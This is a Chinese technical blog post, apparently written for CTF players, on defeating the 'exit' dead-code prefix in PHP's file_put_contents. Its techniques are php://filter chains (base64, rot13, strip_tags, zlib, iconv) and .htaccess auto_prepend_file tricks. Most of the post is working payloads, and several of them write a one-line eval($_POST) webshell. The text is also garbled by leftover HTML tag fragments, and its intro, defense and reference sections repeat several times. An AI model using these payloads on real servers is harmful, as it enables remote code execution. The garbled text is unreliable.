PHP中file_put_contents的绕过技术详解<\/h1>

引言<\/h2>
本文详细分析PHP中`file_put_contents<\/code>函数的三种常见限制情况及其绕过方法，主要利用PHP伪协议filter结合编码转换或过滤器来分解死亡代码或杂糅代码。<\/p>`

三种常见情况分析<\/h2>
情况一：文件名和内容可控<\/h3>
file_put_contents<\/span>($filename, "<?php exit();"<\/span>.<\/span>$content);
<\/span><\/span><\/code><\/pre>绕过方法：<\/h4>


Base64编码绕过<\/strong><\/p>
$filename =<\/span> 'php:\/\/filter\/convert.base64-decode\/resource=s1mple.php'<\/span>;
<\/span><\/span>$content =<\/span> 'aPD9waHAgcGhwaW5mbygpOz8+'<\/span>; \/\/ 注意前面补'a'保持4字节对齐
<\/span><\/span><\/span><\/code><\/pre>
原理：base64解码将死亡代码转为乱码<\/li>
注意：需保持4字节对齐，前面补字符<\/li>
<\/ul>
<\/li>

rot13编码绕过<\/strong><\/p>
$filename =<\/span> 'php:\/\/filter\/string.rot13\/resource=s1mple.php'<\/span>;
<\/span><\/span>$content =<\/span> '<?cuc rkvg();?>'<\/span> .<\/span> 'cucvasb();'<\/span>;
<\/span><\/span><\/code><\/pre>
注意：服务器开启短标签时可能被解析<\/li>
<\/ul>
<\/li>

.htaccess预包含利用<\/strong><\/p>
$filename =<\/span> 'php:\/\/filter\/write=string.strip_tags\/resource=.htaccess'<\/span>;
<\/span><\/span>$content =<\/span> '?>php_value%20auto_prepend_file%20G:\s1mple.php'<\/span>;
<\/span><\/span><\/code><\/pre>
原理：过滤HTML标签消除死亡代码<\/li>
限制：PHP7.3.0+废弃此过滤器<\/li>
<\/ul>
<\/li>

过滤器组合拳<\/strong><\/p>

PHP5环境：
$filename =<\/span> 'php:\/\/filter\/string.strip_tags|convert.base64-decode\/resource=s1mple.php'<\/span>;
<\/span><\/span>$content =<\/span> '?>PD9waHAgcGhwaW5mbygpOz8+'<\/span>;
<\/span><\/span><\/code><\/pre><\/li>
PHP7环境：
$filename =<\/span> 'php:\/\/filter\/zlib.deflate|string.tolower|zlib.inflate|\/resource=s1mple.php'<\/span>;
<\/span><\/span>$content =<\/span> 'php:\/\/filter\/zlib.deflate|string.tolower|zlib.inflate|?> <?php %0dphpinfo();?>'<\/span>;
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ol>
情况二：单一变量控制<\/h3>
file_put_contents<\/span>($content, "<?php exit();"<\/span>.<\/span>$content);
<\/span><\/span><\/code><\/pre>绕过方法：<\/h4>


.htaccess预包含<\/strong><\/p>
?<\/span>content<\/span>=<\/span>php<\/span>:\/\/<\/span>filter<\/span>\/<\/span>write<\/span>=<\/span>string<\/span>.<\/span>strip_tags<\/span>\/<\/span>?><\/span>php_value%20auto_prepend_file%20G:\s1mple.php%0a%23\/resource=.htaccess
<\/span><\/span><\/span><\/code><\/pre><\/li>

Base64编码绕过<\/strong><\/p>

直接方式（可能失败）：
php<\/span>:\/\/<\/span>filter<\/span>\/<\/span>convert<\/span>.<\/span>base64<\/span>-<\/span>decode<\/span>\/<\/span>PD9waHAgcGhwaW5mbygpOz8<\/span>+\/<\/span>resource<\/span>=<\/span>s1mple<\/span>.<\/span>php<\/span>
<\/span><\/span><\/code><\/pre><\/li>
改进方式（过滤器嵌套）：
php<\/span>:\/\/<\/span>filter<\/span>\/<\/span>string<\/span>.<\/span>strip<\/span>.<\/span>tags<\/span>|<\/span>convert<\/span>.<\/span>base64<\/span>-<\/span>decode<\/span>\/<\/span>resource<\/span>=<\/span>?><\/span>PD9waHAgcGhwaW5mbygpOz8%2B.php
<\/span><\/span><\/span><\/code><\/pre><\/li>
伪目录方式：
php<\/span>:\/\/<\/span>filter<\/span>\/<\/span>write<\/span>=<\/span>string<\/span>.<\/span>strip_tags<\/span>|<\/span>convert<\/span>.<\/span>base64<\/span>-<\/span>decode<\/span>\/<\/span>resource<\/span>=<\/span>?><\/span>PD9waHAgcGhwaW5mbygpOz8%2B\/..\/s1mple.php
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

rot13编码<\/strong><\/p>
php<\/span>:\/\/<\/span>filter<\/span>\/<\/span>write<\/span>=<\/span>string<\/span>.<\/span>rot13<\/span>|<?<\/span>cuc<\/span> cucvasb<\/span>();?><\/span>|\/resource=s1mple.php
<\/span><\/span><\/span><\/code><\/pre><\/li>

convert.iconv编码转换<\/strong><\/p>

UCS-2编码（2位一反转）：
php<\/span>:\/\/<\/span>filter<\/span>\/<\/span>convert<\/span>.<\/span>iconv<\/span>.<\/span>UCS<\/span>-<\/span>2<\/span>LE<\/span>.<\/span>UCS<\/span>-<\/span>2<\/span>BE<\/span>|?<<\/span>hp<\/span> pe<\/span>@<\/span>av<\/span>(l_<\/span>$OPTSs[m1lp<\/span>]e<\/span>;)>?\/<\/span>resource<\/span>=<\/span>s1mple<\/span>.<\/span>php<\/span>
<\/span><\/span><\/code><\/pre><\/li>
UCS-4编码（4位一反转）：
php<\/span>:\/\/<\/span>filter<\/span>\/<\/span>convert<\/span>.<\/span>iconv<\/span>.<\/span>UCS<\/span>-<\/span>4<\/span>LE<\/span>.<\/span>UCS<\/span>-<\/span>4<\/span>BE<\/span>|<\/span>hp<\/span>?<<\/span>e<\/span>@%<\/span>20<\/span>p<\/span>(lavOP_<\/span>$s[TS<\/span>]pm1<\/span>>?<\/span>;)\/<\/span>resource<\/span>=<\/span>s1mple<\/span>.<\/span>php<\/span>
<\/span><\/span><\/code><\/pre><\/li>
UTF-8与UTF-7转换：
php<\/span>:\/\/<\/span>filter<\/span>\/<\/span>write<\/span>=<\/span>PD9waHAgQGV2YWwoJF9QT1NUWydhJ10pOz8<\/span>+|<\/span>convert<\/span>.<\/span>iconv<\/span>.<\/span>utf<\/span>-<\/span>8.<\/span>utf<\/span>-<\/span>7<\/span>|<\/span>convert<\/span>.<\/span>base64<\/span>-<\/span>decode<\/span>\/<\/span>resource<\/span>=<\/span>s1mple<\/span>.<\/span>php<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ol>
情况三：内容追加杂糅代码<\/h3>
file_put_contents<\/span>($filename, $content .<\/span> "<\/span>\n<\/span>xxxxxx"<\/span>);
<\/span><\/span><\/code><\/pre>绕过方法：<\/h4>


利用语言特殊标记<\/strong><\/p>

如PHP的<?php ?><\/code>标记可忽略后面杂糅代码<\/li>
<\/ul>
<\/li>

.htaccess文件处理<\/strong><\/p>

使用注释符处理杂糅代码：
$content =<\/span> "# 注释内容 <\/span>\\\n<\/span>php_value auto_prepend_file flag.php"<\/span>;
<\/span><\/span><\/code><\/pre><\/li>
注意：格式敏感，错误会导致文件锁死<\/li>
<\/ul>
<\/li>
<\/ol>
技术原理总结<\/h2>

编码转换<\/strong>：利用base64、rot13等编码使PHP引擎无法识别死亡代码<\/li>
过滤器链<\/strong>：多个过滤器组合使用，层层处理原始内容<\/li>
文件包含<\/strong>：通过.htaccess预包含目标文件<\/li>
编码扰乱<\/strong>：使用iconv进行字符编码转换扰乱原始内容<\/li>
<\/ol>
环境限制说明<\/h2>


PHP版本差异：<\/p>

string.strip_tags<\/code>在PHP7.3.0+废弃<\/li>
部分过滤器仅在特定版本有效<\/li>
<\/ul>
<\/li>

服务器配置：<\/p>

短标签配置影响rot13效果<\/li>
.htaccess文件权限和配置<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

严格过滤用户输入<\/li>
禁用危险协议和过滤器<\/li>
使用最新PHP版本<\/li>
对文件操作进行权限控制<\/li>
<\/ol>
参考文献<\/h2>

关于file_put_contents的一些小测试<\/a><\/li>
Wanghaoran-s1mple的相关文章<\/a><\/li>
<\/ol>

PHP中file_put_contents的绕过技术详解<\/h1>

引言<\/h2> 本文详细分析PHP中file_put_contents<\/code>函数的三种常见限制情况及其绕过方法，主要利用PHP伪协议filter结合编码转换或过滤器来分解死亡代码或杂糅代码。<\/p>

防御建议<\/h2> 严格过滤用户输入<\/li> 禁用危险协议和过滤器<\/li> 使用最新PHP版本<\/li> 对文件操作进行权限控制<\/li> <\/ol> 参考文献<\/h2> 关于file_put_contents的一些小测试<\/a><\/li> Wanghaoran-s1mple的相关文章<\/a><\/li> <\/ol>

参考文献<\/h2> 关于file_put_contents的一些小测试<\/a><\/li> Wanghaoran-s1mple的相关文章<\/a><\/li> <\/ol>

引言<\/h2>
本文详细分析PHP中`file_put_contents<\/code>函数的三种常见限制情况及其绕过方法，主要利用PHP伪协议filter结合编码转换或过滤器来分解死亡代码或杂糅代码。<\/p>`

防御建议<\/h2>

严格过滤用户输入<\/li>
禁用危险协议和过滤器<\/li>
使用最新PHP版本<\/li>
对文件操作进行权限控制<\/li> <\/ol>
参考文献<\/h2>

关于file_put_contents的一些小测试<\/a><\/li>
Wanghaoran-s1mple的相关文章<\/a><\/li> <\/ol>

参考文献<\/h2>

关于file_put_contents的一些小测试<\/a><\/li>
Wanghaoran-s1mple的相关文章<\/a><\/li> <\/ol>